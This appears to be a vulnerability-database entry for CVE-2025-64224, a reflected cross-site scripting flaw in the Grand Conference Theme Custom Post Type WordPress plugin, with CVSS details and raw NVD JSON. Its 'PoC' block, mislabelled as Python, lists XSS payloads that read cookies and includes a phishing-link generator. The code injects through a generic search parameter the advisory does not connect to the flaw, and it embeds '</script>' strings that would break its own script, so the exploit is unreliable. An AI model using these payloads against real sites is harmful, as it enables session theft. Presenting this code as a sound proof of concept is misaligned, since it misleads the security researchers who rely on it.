Security Vulnerability Report
中文
CVE-2025-64224 CVSS 7.1 HIGH

CVE-2025-64224

Published: 2025-11-06 16:16:14
Last Modified: 2026-01-29 15:08:10

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Conference Theme Custom Post Type grandconference-custom-post allows Reflected XSS.This issue affects Grand Conference Theme Custom Post Type: from n/a through < 2.6.4.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:themegoods:grand_conference:*:*:*:*:*:wordpress:*:* - VULNERABLE
grandconference-custom-post < 2.6.4
Grand Conference Theme Custom Post Type 所有n/a至2.6.4之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-64224 PoC - Reflected XSS in Grand Conference Theme --> <!-- Example malicious URL --> <script> // Construct the malicious URL with XSS payload const baseUrl = window.location.origin + '/wordpress-path/'; const maliciousUrl = baseUrl + '?s=<script>alert(document.cookie)</script>'; // Alternative payload variants const payloads = [ '<script>alert(document.domain)</script>', '<img src=x onerror=alert(1)>', '<svg onload=alert(document.cookie)>', "javascript:alert(String.fromCharCode(88,83,83))", '<iframe src="javascript:alert(`XSS`)">' ]; // Function to generate phishing link function generatePhishingLink(payload) { return baseUrl + '?s=' + encodeURIComponent(payload); } // Display generated links console.log('Malicious Links Generated:'); payloads.forEach((payload, index) => { console.log(`Link ${index + 1}: ${generatePhishingLink(payload)}`); }); </script> <!-- HTML PoC Template --> <!-- <!DOCTYPE html> <html> <head> <title>XSS PoC - CVE-2025-64224</title> </head> <body> <h1>CVE-2025-64224 Reflected XSS PoC</h1> <p>Click the link below to test the vulnerability:</p> <a href="http://target-site.com/?s=<script>alert('XSS')</script>" id="maliciousLink">Click Me</a> <script> document.getElementById('maliciousLink').href = window.location.origin + '/?s=<script>alert(document.cookie)</script>'; </script> </body> </html> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64224", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:14.173", "lastModified": "2026-01-29T15:08:10.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Conference Theme Custom Post Type grandconference-custom-post allows Reflected XSS.This issue affects Grand Conference Theme Custom Post Type: from n/a through < 2.6.4."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('Cross-Site Scripting') vulnerabilidad en ThemeGoods Grand Conference Theme Custom Post Type grandconference-custom-post permite XSS Reflejado. Este problema afecta a Grand Conference Theme Custom Post Type: desde n/a hasta &lt; 2.6.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:themegoods:grand_conference:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.6.4", "matchCriteriaId": "BB24FF14-5104-4FCA-A287-38B4F0E7704C"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/grandconference-custom-post/vulnerability/wordpress-grand-conference-theme-custom-post-type-plugin-2-6-4-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}